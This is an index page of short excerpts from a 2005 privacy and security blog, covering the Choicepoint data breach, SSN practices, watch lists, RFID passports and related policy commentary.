The other day, Samablog and I did some P2P mining, after Michelle Malkin blogged about it. She links to P2P Provides Safe Haven For Pedophiles. There, Rick shows screen captures of extremely disgusting file names (“2 yo getting raped during diaper change”). He doesn’t download any files, but takes this as evidence for his title. […]

 

Optimism about the Future

I was talking to someone about a New York Times story “U.S. Is Examining a Plan to Bolster the Rights of Detainees.” The story contains the line: Those changes include strengthening the rights of defendants, establishing more independent judges to lead the panels and barring confessions obtained by torture, the officials said. I made a […]

 

Choicepoint, March 27-28

EPIC has obtained documents which… … reveal that Choicepoint proposed the sale of detailed personal information to the Bureau for law enforcement purposes. The documents show an extraordinary range of data sources, including e-mail registration, cookies, spyware, employment screening reports, motor vehicle records, drug screening results, professional licensing, Social Security Numbers, wireless phones records, and […]

 

Emergent Predictions

By the end of 2005, we will have had a month with at least 30 disclosures of serious security breaches, making private information about people available. At least 10 of these breaches will involve data which organizations are required by law to store and protect. This will cause a set of Congressional hearings, in which […]

 

Watch Lists: Juan Carlos Merida

Juan Carlos Merida is an unusual victim of the watch lists. He knows why he’s on one. As the New York Times reports, while a volunteer at the Airman Flight School, he gave rides to lots of students. The students he gave rides to included Zacarias Moussaoui, who is currently awaiting trial on suspicion of […]

 

RFID Kills

The US Government is pushing a plan to add radios to every passport in the world. These radios will broadcast all the information in your passport to any immigration officer, id thief, or terrorist who wants it. Want to see if there are more Americans on the right or left side of the plaza? No […]

 

Microsoft Security Lifecycle

Michael Howard mentions that Microsoft has published their Software Development Lifecycle for security. Slag all you want, but I don’t see a lot of other vendors doing this. And now, if you need leverage to get buy in, you can either say, “We should emulate Microsoft…” or “Even Microsoft does…” It’s a win. Thanks for […]

 

Framing Effects & Law Reviews

Framing effects are what a variety of types of academics call the variety of contextual effects on perception. For example, six months ago, this laptop went for $4800, and now it’s just $3,500! Similarly, law reviews, where lawyers write for each other, are usually exceptionally long, from my perspective. And so we get Orin Kerr […]

 

Small Bits: Long tunnels, Marburg virus, Cyber Cons

Iraqi prisoners have dug a 200m tunnel out of one of the US run prisons in Iraq. The BBC has pictures. The Marburg is spreading in Angola. Marburg is an Ebola-like heamorraghic agent. Some analysis. Charles Cooper has some commentary ranting about the state of the information security industry at cnet: It’s tempting to become […]

 

Lying to Congress, Murdering Prisoners Now Legal

Ryan Singel reports that lying to Congress is now legal, at least according to TSA spokeswoman Amy Von Walter. “Von Walter also indicated the agency is working to make sure that the public and Congress are better informed about the agency’s actions.” In other news, the Pentagon will ignore the recommendation of the Army Criminal […]

 

Choicepoint, March 24/25

The Federal Reserve has joined the FDIC in ordering banks to notify customers of breaches. Forbes reports that Choicepoint director Thomas Coughlin has resigned his day job at Wal-Mart: “A senior board member of Wal-Mart Stores Inc. resigned Friday following an internal investigation related to personal reimbursements, billing and company gift cards.” [Choicepoint CEO] Derek […]

 

Security In a Changing Nation

Screendiscussion responds to my comments about “Three Privacy Breaches” in Security In a Changing Nation. He sums up his argument as “Why? The reason is that we, as a nation, have become extremely security conscious in the past few years.” I think this is only partially correct. I suspect that this is part of it. […]

 

Small Bits of Chaos: Anonymity, Citizenship

Ed Felten summarizes Wendy Seltzer’s comments on the NYT “Open Wifi is evil” article: “anonymous sources claim anonymity is evil.” The Department of Citizenship amends their terms and conditions. (Via Michael Froomkin.)

 

Discretionary Disclosure

A man who pleaded guilty to hacking into an Arkansas data company’s computer system and stealing personal identification files was sentenced Wednesday to nearly four years in federal prison. Daniel J. Baas, 26, of suburban Milford, entered his plea in December 2003, after being indicted that August. Baas was a systems administrator for Market Intelligence […]

 

Disclosure Laws & Regulations

Declan McCullagh writes about new rules requiring banks to disclose breaches, as promulgated by an alphabet soup of federal regulators. A brief digression: The new guidelines seem to make sense, but it’s difficult to figure out whether they go too far or not far enough. Normally consumers can shop around and choose products based on […]

 

"A Unified Theory of VC Suckage"

Brad Feld pointed to an essay by Paul Graham, entitled “A Unified Theory of VC Suckage.” (VC is short for venture capitalist, the folks who invest in certain types of startup companies.) I used to take it for granted that VCs were like this. Complaining that VCs were jerks used to seem as naive to […]

 

"What Would Gandhi do?"

“What would Gandhi do?” is the title of a soul-searching post by Joi Ito about positioning. It reminded me of a passage in William Shirer’s memoir of his time with Gandhi. I’d like to quote the passage, which ends chapter 11, and then add some comments. The context is Gandhi’s visit to England, and in […]

 

Three Privacy Breaches

“DMV hopes to reassure clients about security.” The DMV on Wednesday will send out letters describing the incident and new driver’s licenses with different numbers to the 8,738 people whose personal information was stored on the stolen computer, said Kevin Malone, spokesman for the DMV. “Audit: State voter system left information vulnerable:” The state elections […]

 

Small Bits: Hell, TSA, Insurance, Mutual Funds, Telephone Privacy

Asteroid analyzes Sisyphean volunteers and the modern condition in a brilliant essay. It just goes to show, the Greeks really did invent everything. Robert Poole and Jim Harper debate the TSA in “Transportation Security Aggravation” at Reason. Tyler Hamilton looks at two schemes to cut your auto insurance premiums by monitoring your driving, and their […]

 

Choicepoint, March 22/23

The Daily Caveat rounds up the five shareholder lawsuits against Choicepoint. The Atlanta Business Journal has an article on Choicepoint’s executive compensation. Kim Zetter at Wired has a 3 page story on Choicepoint’s Checks Under Fire. CNN reports that only 11% of id theft occurs online. Well, actually, there might be some methodological problems. It’s […]

 

Those Exemplars of Ethics at the UN

Read this transcript about former UN Oil-for-Food program lead, Benon Sevan. Apparently the UN is paying his legal fees. Question: The other question was a follow-up to a story in the New York Sun today. The United Nations has been paying Benon Sevan’s legal fees. Is this appropriate? Is this normal practice? And why did […]

 

How Many Home Pages?

I was trying to enter someone’s web address into Apple’s Address book recently. Unfortunately, Apple believes that you have a home page. This is at odds with almost all the other fields in Address Book. You can have lots of phone numbers. A profusion of email addresses. And one home page. Me? I have a […]

 

Choicepoint, March 21

Businessweek has an editorial, saying strong regulation is unlikely, but credit freezes, mandatory disclosure, and liability for breaches should come. (I’d argue that liability for inaccuracy, creating a duty to the subjects of a database should also be considered a floor for a new law.) EPIC has written to the FTC, critiquing their testimony. (Via […]

 

Kyrgystani Democracy

The BBC is reporting that Opposition demonstrators in Kyrgyzstan have taken control of a town, as protests continue a week after the second round of disputed elections. In Jalal-Abad, a police station was set on fire, and protesters took control of the airport to prevent reinforcements being flown in. Protesters say President Askar Akayev’s party […]

 

Response to Solove & Hoofnagle

As I mentioned previously, Daniel Solove and Chris Hoofnagle have written a paper on “A Model Privacy Regime.” This post makes a lot more sense if you’ve read their paper. I’ve read through it, and think that it’s pretty good. My responses to specific sections are below. First I’d like to comment on the free […]

 

Choicepoint, March 20

Susan Kuchinskas writes “No Security in SSNs?” for Internetnews. Credit bureaus and information brokers will doubtless lobby Congress, saying changes to the rules will hurt their business. But Solove said their voices might not carry as much weight as they used to. “They had their chance. They weakened the legislation, and, as a result, more […]

 

Small Bits: Avoid Brink's, Code Metrics, Privacy Regs, Blackstone

Ed Foster writes about Brink’s contract provisions with contracts that don’t go month to month, but year to year when you try to leave. Brink’s is fully within their right to write such contracts, and I’m free to suggest that you should consider shopping elsewhere. (Via Dan Gillmor.) Mark Miller suggests a new code metric, […]

 

Choicepoint, March 19

Not In Chicago Anymore comments on Handling of Credit Related Information, and some of the possible repercussions of new law. Ryan Singel at Secondary Screening points out in “Popcorn, popcorn” that (Choicepoint Vice President) McGuffey testified under oath that he told (CPS President) Doug Curling about the investigation in November, which would mean that Curling […]

 

Screening the Open Society Paradox

If you’ve been enjoying the Chaos-Paradox spat, Ryan Singel’s Paradox Still a Paradox is not to be missed: But when it comes to big data brokers that compile dossiers on Americans and list marketing firms that enhance their lists with data bought from data brokers, Bailey thinks they should be immune from the return gaze, […]

 

Bad advice on SSNs

Bad advice on use of social security numbers abounds, often in technical documentation. Credit goes to reader Jonathan Conway for digging many these out. There are a few very common errors which we can find, thank to Jonathan’s research: Social security numbers are un-changing. No, they are not. Victims of identity theft, domestic abuse, or […]

 

Choicepoint, March 18

ChoicePoint’s data bonanza lures thieves , in the Atlanta Journal Constitution. The Q Speaks asks what have we wrought in “ID theft writ large” In another example of what we have wrought, “the Fairfax County’s School Board awarded a contract Thursday night to ChoicePoint, Inc., for testing student athletes and bus drivers for drug and […]

 

Colleges and SSNs

For a very long time, colleges have been using social security numbers as identifiers for their prospects, students, and alumni. This is starting to change, driven by liability and brand concerns. No school wants to transform your (hopefully) fond memories of your time there into a firestorm over privacy. From ZDNet: Dunn said [Boston] college […]

 

Chris Allen and Socializing

Chris Allen has been doing a series of posts on the sizes of social groups, what factors can make groups work and not work, and related bits, like the use of software to help manage groups of friends. His latest post is Dunbar, Altruistic Punishment, and Meta-Moderation. It concludes: In summary this research offers me […]

 
 

Google Makes It Look Easy

Google Labs has done an OSX Dock style home page. It’s pretty cool. What makes it cool is not the graphical style it presents, but the brilliance of the icon design. If you know what services Google offers, the icon makes sense. (I had to mouse over local, video and options to see what they […]

 

DHS Planning Better

Cryptome publishes “Homeland Security Council: 15 Attack Scenarios“, “DHS Universal Task List v.2.0“, and “DHS Target Capabilities List v.1.0.” It looks like a well executed set of planning docs. Some quotes from the New York Times: The agency’s objective is not to scare the public, officials said, and they have no credible intelligence that such […]

 

My Categories Suck

The categories I’ve set for this blog are non-functional. I have 16 categories, of which maybe 4 are ever exclusive. Do you look at my categorization of posts? Do you look at the category archives? Should I create a new set of categories? If so, what? (mmm, Choicepoint! Not.) Should I abandon categories and go […]

 

Choicepoint, March 15

The LA Times has more on what happened, and Choicepoint’s controls. A great many people feel that this is a compelling story. I enjoyed reading the spouter inn. Finally, today’s Two Minutes Hate comes to you from Futurismic. I’ve been covering Choicepoint issues since the scandal broke.

 

"Taxation Ventage"

Justin Mason has a great rant, titled “taxation ventage.” In the US, every worker is required to prepare and file their own taxes, in detail. Nowhere outside of India can do bureaucracy quite like the US, as far as I can tell — even the brits have embraced simplicity to a greater degree — so […]

 

Choicepoint Roundup, March 14

Omari Norman takes issue with the term identity theft. It’s a good point. Paul Syverson has pointed out that correct terms are “fraud,” “misrepresentation” and “libel,” but those don’t seem to have caught on. This ABC News story about how Americans think there’s too much government secrecy doesn’t relate directly to Choicepoint, except the government […]

 

Privacy and Background Checks

In a comment, Axinar writes: Is it reasonable for an employer to know whether or not a potential employee has a history of violence or theft? Well, probably. And with our liability situation the way it is, generally any company with deep pockets is virtually REQUIRED to run background checks because if an employee “goes […]

 

What to do, What to do?

Over at Open Society Paradox, Dennis Bailey challenges me: Emergent Chaos documents some problems but ends with a personal slam against ChoicePoint’s CEO. [Ed Note: Technically, we call that the “middle,” not the end.] What would Emergent Chaos have us do? Should we follow the Fair Information Practices and allow 300 million citizens to be […]

 

Emergent Uses of Technology

I love navel gazing. I try not to expose my readers to too much of it, but this post by Seth Schoen at EFF’s Deep Links captures the spirit I think about when talking about emergent chaos: The Business Models working group‘s mission has been based on the premise that “no system can be properly […]

 

Why Choicepoint Resonates

It’s now a full month since Bob Sullivan of MSNBC broke the Choicepoint story. I’d like to think back, and ask, why does this story have legs? Why are reporters still covering it? There are a couple of important trends which combine to make this a perfect storm, attractive to editors and readers. (It’s useful […]

 

Choicepoint Roundup, March 13

Axiomlounge talks about public records, outsourcing, and the public records laws that cause all of this. Joseph Menn has a great story at the LA Times called “Did Choicepoint End Run Backfire?” Menn asks questions about the effect of Choicepoint’s choices in avoiding regulation. Public Domain Progress notes is not archival quality. Speaking of which, […]

 

More on Nevada DMV

In working on the Choicepoint roundup for tomorrow, I found Axinar pointing to this story about the Las Vegas DMV heist. Apparently, all that encryption? Err. Never mind. But Lewis said Friday that Digimarc Corp., the Beaverton, Ore.,-based company that provides digital driver’s licenses in Nevada, told her Thursday the information was not encrypted, and […]

 

Leaving AIM

Although you or the owner of the Content retain ownership of all right, title and interest in Content that you post to any AIM Product, AOL owns all right, title and interest in any compilation, collective work or other derivative work created by AOL using or incorporating this Content. In addition, by posting Content on […]

 

Choicepoint Roundup, March 12

Ryan Singel has interesting analysis of the FTC’s Congressional testimony. Ellen Simon of the AP has a story about her Choicepoint and Lexis Nexis files. Hint: They’re imperfect, but that won’t stop them from screwing up your life. Others (nothing to see here, Scott C Smith) touch on the same theme. The Daily Caveat points […]

 

France Imitates Art, Stalin

Boing Boing comments on a French stamp with an airbrushed picture of Sarte, sans cigarette. However, the French are way behind on this. Uncle Sam led the way in airbrushing cigarettes, but not people, out of pictures, as these two images of blues pioneer Robert Johnson show. The Honolulu Star got a great quote from […]

 

Hank Asher

Dennis Bailey at The Open Society Paradox objects to my characterization of Hank Asher, and says: Rather than debate the merits of the program, they have to make this a personal attack on the man. Well, let’s talk about the programs. DBT, the first company Asher founded, was deeply involved in disenfranchising Florida voters. MATRIX […]

 

Small Bits: ID Angel, Books and Garbage

Latanya Sweeney has announced a new tool, Identity Angel, to crawl the web and discover if there’s enough information to steal an identity. Stefan Brands has made the first four chapters of a book on Electronic Money available. This will be a great reference for people wanting to think about privacy and payments. I’d like […]

 

No Fly List: Welcome, Salman Rushdie

D Magazine is looking for a private plane to transport Salman Rushdie so he can speak at an event in Dallas. Apparently, he’s been denied the ability to board a plane. Maybe someone realized he’s associated with Islamic Terrorists? (Via Virginia Postrel.) In other news, the Coalition of Airline Pilots Association has released an airline […]

 

New American Privacy Law: What Could It Say?

With recent events (Choicepoint, Bank Of America, PayMaxx, and Lexis Nexis) leading to a new privacy law for the United States, what should it say? How can we tell a good law from a bad one? Some disclaimers: I’m not entirely in favor of a new law. There’s a lot of potential for harm when […]

 

New Security Blog

I like the cynicism displayed at http://security.typepad.com/, by a squinty fellow who seems to want to remain anonymous.

 

What's Wrong With Lexis-Nexis?

It seems that Lexis Nexis’s breach was because of bad passwords: The incidents arose from the misappropriation by third parties of IDs and passwords from legitimate customers. I don’t mean to be snide. No, that’s a lie. I do. It’s 2005. You’re making all this data available via a password? Are your auditors telling you […]

 

Alec Muffet on ID Cards

Alec Muffet provides the best way I’ve seen to get people to take up National ID Cards: Loyalty points. He claims to be kidding, but I’ve already picked up a dozen citizenship points by turning him in for Mocking the Crown. That brings me nearly halfway to an upgraded room next time I’m in the […]

 

Choicepoint Roundup, March 10

Harry Weber of the Associated Press is looking to talk to Choicepoint employees. Email him at hweber@ap.org He’s been covering the story since it broke. The readers of Chief Security Officer Online have spoken, and not one opposes more disclosure laws. (As of noon, Thursday.) Bruce Schneier asks why Choicepoint seems to be saying “Please […]

 

Financial Privacy Regulations, 5 Years Behind?

The American Banker has a long story about how some regulations from GLB are now five years behind schedule: Ironically, both bankers and consumer advocates panned the agencies when they proposed guidelines on identity theft prevention in August 2003. The 25-page guidelines were based on Section 501 of the Gramm-Leach-Bliley Act of 1999, which required […]

 

1,700 Drivers Licenses stolen

The theft occurred early Monday in a remote industrial area, authorities said. The thieves took blank licenses and laminated covers, a digital license camera, a camera computer and a license printer. … “It’s been pondered that this has national security interests,” [police spokesman Tim] Bedwell said. “But it’s easier to pass a fake ID to […]

 

Small Bits: How to live, drive, be identified, and stuck in a database.

A great essay on living and working creatively by Milton Glaser (via BoingBoing) What it takes to get a drivers license in Germany. Stefan Brands On Quintessenz and the Biometric Consortium. Quintessenz is an Austrian civil liberties group that’s learned about how NSA is driving the biometrics industry. What may be the largest database on […]

 

Attackers, Disclosure and Expectations

In both military or information security situations, the position of the attacker is very powerful. An attacker can choose when, where, and how to attack. Attackers are not constrained by change management committees, operational risk, or a need to make economic tradeoffs within a budget. [1] Attackers don’t need to consider other work that needs […]

 

More on Watch Lists

To follow up to my post on Terror Suspects and Firearms, I’d like to take a moment to rail against the Kafka-esque implementation of “watch lists” in the United States. For the FBI, or other investigative or intelligence agencies, to have lists of “interesting people” makes perfect sense. You’ll always have people who you suspect […]

 

Terror Suspects and Firearms

The New York Times is running a somewhat alarmist article, Terror Suspects Buying Firearms, Report Finds. The report says that At least 44 times from February 2004 to June, people whom the F.B.I. regards as known or suspected members of terrorist groups sought permission to buy or carry a gun, the investigation found. In all […]

 

Choicepoint Roundup, March 8

Today’s roundup takes a different turn with more about privacy-invasive infrastructures. Also, previous scammer gets 5½ years, and Choicepoint appoints a new officer to deal with compliance and credentials. Deep in the Heart of … France discusses the move to hosted applications, and ties in Choicepoint as an example of the new security issues, like […]

 

Small Bits: Art, Chopsticks, Security

Stefan Geens points to It Takes More Than Money to Buy a Hot Piece of Art. I Came to Japan Because of the Chopstick makes dinner plates fascinating. Thanks Rosa! Two shorts at AntiTerrorism & Security: The firm running airport security at SFO has been accused of cheating by a former manager. The lawsuit is […]

 

Choicepoint Roundup, March 7

Saturday’s New York Times reports (thanks Alex for the pointer): Lt. Ronnie Williams, project director of the Southern California Identity Theft Task Force, which is investigating the ChoicePoint case, said that the breach was brought to his agency’s attention in late October, and that on Nov. 23, the agency asked the company to delay notifying […]

 

More on CVSS

Erik Rescorla takes note of my CVSS post, and comments that he’s not sure he likes some technical aspects of the system (emphasis added): CVSS does have a formula which gives you a complete ordering but the paper doesn’t contain any real explanation for where that formula comes from. The weighting factors are pretty obviously […]

 

Choicepoint Roundup, March 6

The Atlanta Journal Constitution contains the first MSM discussion I’ve seen of Derek Smith losing his job over this. Evan Hendricks of Privacy Times has a good article in the Washington Post, discussing who owns data, how we’ve gotten here. Axel, of Balrog.de comments “that ChoicePoint does NOT state in that Form 8-K that they […]

 

Economics of Fake IDs

Some states will begin using new watermark technology akin to that used on currency for drivers’ licenses next year… While the backers of these efforts say they herald the demise of the fake ID, officers on the beat have doubts. “They find a loophole and exploit it,” said Sergeant Planeta of the New York document […]

 

Small Bits of Chaos: Advertising and The Gulag Evolution

Scrivner points out that the Golden Palace is winning all bids to advertise on people’s bodies, and asks “What is all this telling us? Ummm, Scrivner, it’s telling us…Visit Golden Palace! These foxes are being bred for tameness by scientists in Siberia. (I hope that URL is resilient?) I guess that’s what happens when you’re […]

 

Choicepoint Roundup, March 5

My big question for the day: When Choicepoint announced a re-screening of their small business customers, that segment was 5% of their $900m revenue. Today’s announcement of closing that segment is $15-20m, or about 2%. So it seems that the exceptions that they list in their 8K account for 60% of their small business sales. […]

 

Has Hezbollah Studied Boyd?

Iraq The Model points to this WorldNetDaily article: Designating Hezbollah a terror group in Europe will mean “the sources of [our] funding will dry up and the sources of moral, political and material support will be destroyed,” Nasrallah told Al Manar, Hezbollah’s satellite television station. Boyd discusses war as having moral, mental, and physical dimensions, […]

 

Congrats, Microsoft

“On March 8th, 2005, the Microsoft Security Response Center is planning to release no new security bulletins,” the Redmond, Wash.-based developer said on its Microsoft Security Bulletin Advance Notification Web site Thursday morning. (Via Information Week, via ISN)

 

Choicepoint Roundup, March 4

The focus of today’s roundup is “an object lesson in how not to manage a crisis.” Call Choicepoint CEO Derek Smith at home, 770 667 5775, and tell him what you think. Remember, Atlanta is on Eastern Standard Time. On to the roundup: Not Bad For a Cubicle points out that “This is the first […]

 

Google, Flat Earthers?

I visited maps.google.com, and tried going east from the default view. A press of the “right” button seems to move you about 1,500 miles east. A second press takes you, err, nowhere. Another 16 or so clicks should be bringing you to the West coast of the US, but no luck. (25000 miles/1500 miles per […]

 

Small Bits: Teen Drinking, TSA Databasing, hope, and trust.

This New York Times story discusses the “need” to submit high school students to Breathalyzer tests to ensure they’re not drinking. It’s a good thing we have all those mandatory ID checks. It seems they’re highly effective at stopping teen drinking, so there’s no need for such tests. The TSA is maintaining a secret database […]

 

MMR & Autism

There’s a belief out there that the measles, mumps and rubella (MMR) vaccination is linked to autism, with some scientific sounding hypothesis as to what the causal link is. The BBC is reporting on a study done by Hideo Honda of the Yokohama Rehabilitation Center, along with Yasuo Shimizu and Michael Rutter of the Institute […]

 

Common Vulnerability Scoring System

At RSA, Mike Schiffman presented a Common Vulnerability Scoring System. Brian Erdelyi has taken that, and made a web page to generate numbers. It’s at SecurityHive. (The page requires Javascript be turned on to function.)

 

It's Not About Not Feeling Pain

On Monday, I had the opportunity to see Ed Tufte teach. Much of his analysis revolves around failures to think clearly. Things like poor presentation of data, or selection of data to not include enough context. He said he was in Houston last week, giving a class to the people who were responsible for the […]

 

Astrologers and National ID Cards

I often hear folks who believe in astrology saying things like “That’s just the scorpio in her.” Or, “All Leos act that way.” I rarely hear them say “That’s so unlike a scorpio.” Underlying this is a mind-set which searches for ‘evidence in favor’ of a proposition. This search is a fundamental, and common, misunderstanding […]

 

Small Bits of Chaos: Tempest Tents, Medical Records, Openness

One of the neat things about talking to different sorts of conferences is that you find neat stuff that you don’t otherwise see. At the Southeast Cybercrime Summit, I was supposed to talk about “Reducing Crime In Cyberspace, a Privacy Industry View.” (The talk I used to give for Zero-Knowledge.) Due to a small error […]

 

Gordon on Security

There’s a good interview with Larry Gordon at SecurityPipeline. It came out in April of last year, but I’d missed it. Gordon has hosted the Security and Economics workshop. “I go to security conferences where we all sit around puzzling about what kind of metrics to use for measuring the results of security programs,” says […]

 

500th Post

In the 195 days since I started this blog, I’ve posted 499 times: This is the 500th. I’d planned, when I started, for about one long post a day. It hasn’t always worked that way. I’m posting slightly more than 2.5 posts a day. I’m think I’m now getting more comments than I post, but […]

 

(T)ourism (S)uppression (A)gency

Webflyer has a good post about the economics of new security rules that the TSA wants to impose: Requiring information to be submitted an hour before flight takeoff involves a full 75 minutes greater notice than currently provided. This will mean passengers turning up at the airport at least an additional hour in advance of […]

 

Choicepoint Roundup (1 March)

KnobBoy, demonstrating that the new media can do research, points out that Choicepoint execs didn’t trade like that before. In an AP Interview, Choicepoint CEO “Smith said he believes his company is as much a victim in the episode as the roughly 145,000 Americans whose personal information may have been viewed by criminals.” The Los […]

 

Software Liability by Contract, Not Regulation

While “other events” are causing me to prevaricate over data protection legislation in the US, it’s great to see this Wall St Journal story (reprinted in the Contra Costra Times) on large software buyers pushing for liability clauses in their contracts. “I’m paying the bill. Other companies are paying the bill,” says Ed Amoroso, AT&T’s […]

 

Emergent Chaos Choicepoint Posts

I have added a Choicepoint category, which is great if you want to see all my posts on Choicepoint on one long page, and I am no longer updating this roundup. I’ve been posting a lot on Choicepoint. I’ve done a number of roundup posts listing things I find interesting around the web, and a […]

 

Choicepoint Roundup ($16,600,000 edition)

Having already posted a Feb 28th roundup a day early, I was forced to think about a new title for today’s edition, and what better than the $16.6 million dollars that ChoicePoint CEO Derek Smith and President Douglas Curling have made selling 472,000 shares of CPS since the day before the first arrest in the […]

 

Choicepoint Roundup (Feb 28)

I accidentally published this too early, but given the nature of trackbacks, and other such privacy-invasive technologies, its too late. You know my secret. I accumulate and then (try to) post in the morning. Midnight Special asks “Where’s the accountability” and talks about government outsourcing and incentives in a well written post. Why Now has […]

 

Publishing a List of SSNs Will Not Fix Anything

Pete Lindstrom suggests: My proposal: List SSNs publicly. The Social Security Agency can notify all of its intent to publish all SSNs at some point in the future – enough time for organizations to absorb and react to this news. The net result is to eliminate the notion that perhaps SSNs are “secure enough” for […]

 

Good Folks Looking for Help

A group that wants to assist free speech in authoritarian nations is looking for a technically savvy person — a CTO or lead engineer type — who can do a short term study, possibly leading to a longer-term job. This is a paying gig for the right person. The project is intended, in its intitial […]

 
 

Choicepoint Roundup for Today (27 Feb)

Choicepoint doesn’t make an appearance in the June, 2003 Congressional testimony of Leonard Bennett, (or PDF), but the testimony is on how hard it is to get your credit files corrected with those companies that follow the Fair Credit Reporting Act. Given that Choicepoint believes that they don’t even have to do that, it will […]

 

Choicepoint's Orientation

As Choicepoint’s little error threatens to grow into a full-blown scandal, with Attorneys-General posturing, Congressional hearings, and daily press coverage in every state of the Union, it may be worth stepping back, and asking, “Why is this happening?” It’s not just the size of the exposure, both Bank of America and PayMaxx are larger. It […]

 

Choicepoint Won't Benefit from Bank of America Leak

I wasn’t going to blog on BofA‘s little kerfuffle. But then Ian went and blogged about it, and I think he gets it partially right and partially very wrong. His actual conclusion is spot on: In order to share the information, and raise the knowledge of what’s important and what’s not, we may have to […]

 

What's with this Dialog?

This dialog box is modal. It has no “take me there” button. Even having taken notes, I couldn’t figure out how to follow the instructions. You can “clear formatting” and make spell checking work again. A double-feh at Redmond. I take back all the mean things I said about Firefox this morning.

 

Two Minutes Hate

So everyone seems to be accepting at face value the claim that Choicepoint was scammed by Olatunji Oluwatosin and colleagues not yet named. But let’s step back, and ask, was there a scam? Why did these folks need to cheat? Was it habit, or necessity? What was really needed to get a Choicepoint account of […]

 

Quick Followups

David Akin says CIBC is getting sued for faxing information around. Prior posts are “Privacy Lessons from CIBC and Canadian privacy law & CIBC. 19 days after the vulnerability was announced, Mozilla releases Firefox 1.01.

 

Choicepoint Roundup for Today

The Associated Press has a story “Burned by ChoicePoint breach, potential ID theft victims face a lifetime of vigilance” (actually, we all face a lifetime of vigilance, as these companies make buckets of money by gossiping about us.). The money quote: Many victims are dumbfounded by the dearth of federal and state laws aimed at […]

 

Roger McNamee on Sarbox

Roger McNamee has an article on how Sarbanes-Oaxley is hurting public companies by making their guidance more conservative than it should be. It’s hard for executives to avoid providing some form of guidance – investors generally insist on it – but they have a big incentive to understate the outlook early in the fiscal year.  […]

 

Finding Security Issues

In Today’s Choicepoint Roundup, I mentioned that Richard Smith had found a number of issues with Choicepoint’s web sites. In discussion, Richard told me that the issues included (but were not limited to) robots.txt files and directory listings enabled. The robots.txt standard is a way to tell search engines “please don’t go here.” That’s useful, […]

 

Small Bits of Chaos: Conferences and What Would Dylan Do?

This Concealled I conference in Ottawa March 4-5 looks really good. Bob Dylan joins the cypherpunks in skipping Woodstock for his trig homework: “I wouldn’t even think about playing music if I was born in these times… I’d probably turn to something like mathematics.” (NME, via Scrivner.) Who did this: Privacy Enhancing Technologies, May 30-June […]

 

Today's Choicepoint Roundup

The Privacy Rights Clearninghouse has an extensive sheet on what to do if you’re a victim of Choicepoint’s failure to secure data. SoftReset calls for banning the use of SSNs for non-government purposes. I take a slightly more moderate view: Anyone using the SSN is already subject to GLB liability. Random Thoughts on Politics comments […]

 

Disclosure and PayMaxx

There seems to be a bit of a spat going between PayMaxx, and ThinkComputer (who may have the worst web site I’ve tried to view in a long time). As documented by Robert Lemos at Ziff-Davis: Greenspan, a former PayMaxx customer, said he discovered the alleged problems in the company’s system more than two weeks […]

 

Oh, there it is.

Back in October, I asked, “where’s the 8-in-1 media reader to take photos directly from your camera.” From today’s Apple press release: The new iPod Camera Connector is an optional accessory that enables customers to connect their digital camera to iPod photo and import their photos into the iPod. By simply connecting the iPod Camera […]

 

When The Future Has No Shadow

I remember when I was in college, discussing what we’d do if we discovered we had a terminal disease. Being college students, there were lots of ways to maximize short-term fun before the disease ate you. The game theory folks talk about “the long shadow of the future,” the idea that cooperation can be rewarded […]

 

Today's Choicepoint Roundup

Google is running an ad when you search on Choicepoint: “ChoicePoint letter says your identity stolen? Learn your rights. www.jameshoyer.com” On clicking through, its just a form, asking someone to contact you. Renaissancemen has a good roundup, including the fact that only 5% or perpetrators are arrested, and a pointer to Kevin Drum arguing for […]

 

More on Choicepoint

Enter ChoicePoint’s two-building campus in Alpharetta, and you get the feeling you are being watched. starts a new story at the Atlanta Journal-Constitution. (Use Bugmenot to login.) It’s sort of ironic. Choicepoint is focused on identifying people, rather than identifying behavior that leads to trouble. They figure once you have an account, they want you […]

 

The Open Passport

Third, this may be all moot if the government takes the easy step of giving citizens a passport cover made of aluminum foil. According to one article “Even Schneier agrees that a properly shielded passport cover should solve the problem. He wonders why this wasn’t included in the original plans for the new passports.” writes […]

 

Cool Tech at RSA: i-Mature

At RSA, I didn’t get a demo, but did talk to John Brainard of RSA about i-Mature, a fascinating biometrics company. There’s been some discussion on Interesting People. Vin McClellan discusses the tech, Seth Finkelstein maps their web site, reporter Andy Sullivan plays with one, Lauren Weinstein on probable attacks, Herb Lin on the limits […]

 

Small Bits of Chaos: Passports, Financial Crypto

Ryan Singel has a good post on chipped passports: Bailey is right that the new passport will be harder to forge with the inclusion of RFID chips, especially since the chip would be digitally signed to prevent changes to the data in the chip. That’s a solid security measure. But, the chips create a new […]

 

Free Mojtaba and Arash!

Sending people to jail for expressing their opinions is wrong. In the west we’ve understood why it was wrong since John Stuart Mill wrote On Liberty. So please, for the betterment of Iran, and the entire world: Mojtaba and Arash are Iranian bloggers jailed for their ideas. What ideas is almost not relevant. Even if […]

 

Cool Tech At RSA

One of the best bits at RSA was at the HP booth. Marc Stiegler, Alan Karp, Ka-Ping Yee and Mark Miller have created Polaris, a system for isolating and controlling untrustworthy code on Windows. The white paper is here. It’s very simple, easy, and looks like a winner. I hope they find a way to […]

 

Security So Good, No One Could Login

One of the ironic bits about the RSA conference was the wireless network. Your username was your email and the password was on your badge. However, I had trouble logging in, so they gave me this username and password. I’m pretty sure that they didn’t record who I was as they did it. Even once […]

 

Hunter S. Thompson, 1937-2005

Hunter S. Thompson killed himself last night. While I enjoyed his books, for me, his ultimate work wasn’t reading about times I hadn’t experienced, but when his writing was live and raw, about the day, when he wrote the definitive obituary of Richard Nixon. He’s gone, and I am poorer for it.

 

Openness: Maps

After RSA, some friends and I went up to Russian River. I was looking at some old maps at the Quinvera Quivira Vineyard, and the caption under one said “The author of this map is believed to have had access to Drake’s secret maps.” Today, large scale maps of everywhere are easily available. But there […]

 

Small Bits on Programming

Max Dornseif asserts it’s easy to find bugs. (Perhaps even easier than figuring out trackbacks for his blog?) In an article in ACM Queue, Ioannis Samoladas, Ioannis Stamelos, Lefteris Angelis, Apostolos Oikonomou examine some measures of code quality between open and closed source apps.

 

What do Apple's Common Criteria Tools Do?

Apple has made available a set of “Common Criteria” tools. The “evaluation” page is here. The evaluation criteria is “EAL 3, CAPP, version 1.d, October 8, 1999.” (The README is a bit better.) If anyone would care to explain to me what I’ve just said, or, really, what the tools package does, I’d be much […]

 

Small Bits: T-Mobile, Google, Passports, Terrorism

Jack Koziol has a long post on security issues with T-Mobile’s web site. (Via /.) Did you know that Google’s “Dissatisfied? Help us improve” link only appears on the first page of a search? That’s fascinating–they expect their search to be so good that they get what you want on page 1, and you’ll complain […]

 

An Open Society?

